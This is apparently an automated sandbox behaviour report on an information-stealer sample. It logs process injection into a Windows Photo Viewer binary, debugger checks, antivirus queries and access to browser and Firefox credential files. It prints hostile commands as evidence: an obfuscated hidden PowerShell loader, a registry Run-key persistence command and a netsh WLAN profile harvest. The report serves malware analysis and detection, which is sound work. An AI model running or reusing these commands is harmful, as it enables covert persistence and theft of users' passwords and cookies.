Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595647
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595537
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595425
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595300
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595173
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595045
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594933
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594822
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594711
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594599
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594471
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594343
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process queried: DebugPort

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process token adjusted: Debug

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 44E0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 327FDBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 4260000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 2DBFB9C

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "udbygningerne230" /t reg_expand_sz /d "%smreplse% -windowstyle minimized $zayat=(get-itemproperty -path 'hkcu:\nonfanatical\').injectors;%smreplse% ($zayat)"
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "udbygningerne230" /t reg_expand_sz /d "%smreplse% -windowstyle minimized $zayat=(get-itemproperty -path 'hkcu:\nonfanatical\').injectors;%smreplse% ($zayat)"

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the product ID of Windows

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PXRECVOWEIWOEI Stealer

Source: Yara match	File source: 00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal WLAN passwords

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key3.db
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
